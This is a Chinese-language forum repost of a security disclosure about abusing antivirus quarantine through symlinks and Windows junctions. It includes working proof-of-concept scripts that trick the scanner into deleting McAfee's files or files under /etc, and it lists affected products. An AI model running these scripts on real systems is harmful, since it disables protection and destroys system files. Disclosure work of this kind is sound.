原帖地址:https://www.rack911labs.com/research/exploiting-almost-every-antivirus-software/
原作者:RACK911 Labs
思路:使用Windows的目录连接或macOS和Linux的符号链接将反病毒软件转变为自我毁灭的工具。
原理:防病毒软件会实时或间断性得执行"实时扫描",如果发现可疑程序,则该文件会被自动隔离并移动到安全位置,等待用户确认如何处理。由于这一工作原理,且几乎所有反病毒软件都在最高权限运行,包括进行文件操作时。那么,恶意程序就可以利用这一特性,在反病毒软件扫描后、清理操作之前的时间窗口里,将被扫描成可疑的文件替换为其他文件的符号链接,从而实现提权删除指定文件。
由于默认情况下,Windows的目录连接或macOS和Linux的符号链接无需最高权限,极易被利用。
[Bash shell] 纯文本查看 复制代码 Windows验证代码(McAfee为例)
:loop
rd /s /q C:\Users\Username\Desktop\exploit
mkdir C:\Users\Username\Desktop\exploit
echo X5O!P%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* > C:\Users\Username\Desktop\exploit\EpSecApiLib.dll
rd /s /q C:\Users\Username\Desktop\exploit
mklink /J C:\Users\Username\Desktop\exploit “C:\Program Files (x86)\McAfee\Endpoint Security\Endpoint Security Platform”
goto loop
[Bash shell] 纯文本查看 复制代码 macOS&Linux验证代码(系统密码存储文件为例)
#!/bin/sh
rm -rf /Users/Username/exploit ; mkdir /Users/Username/exploit
curl -k https://pastebin.com/raw/jZJ6Ekzt > /Users/Username/exploit/passwd
sleep 6
rm -rf /Users/Username/exploit ; ln -s /etc /Users/Username/exploit
验证视频详见原网址。
受影响的软件
Windows平台:
Avast Free Anti-Virus
Avira Free Anti-Virus
BitDefender GravityZone
Comodo Endpoint Security
F-Secure Computer Protection
FireEye Endpoint Security
Intercept X (Sophos)
Kaspersky Endpoint Security
Malwarebytes for Windows
McAfee Endpoint Security
Panda Dome
Webroot Secure Anywhere
MacOS:
AVG
BitDefender Total Security
Eset Cyber Security
Kaspersky Internet Security
McAfee Total Protection
Microsoft Defender (BETA)
Norton Security
Sophos Home
Webroot Secure Anywhere
Linux:
BitDefender GravityZone
Comodo Endpoint Security
Eset File Server Security
F-Secure Linux Security
Kaspersy Endpoint Security
McAfee Endpoint Security
Sophos Anti-Virus for Linux |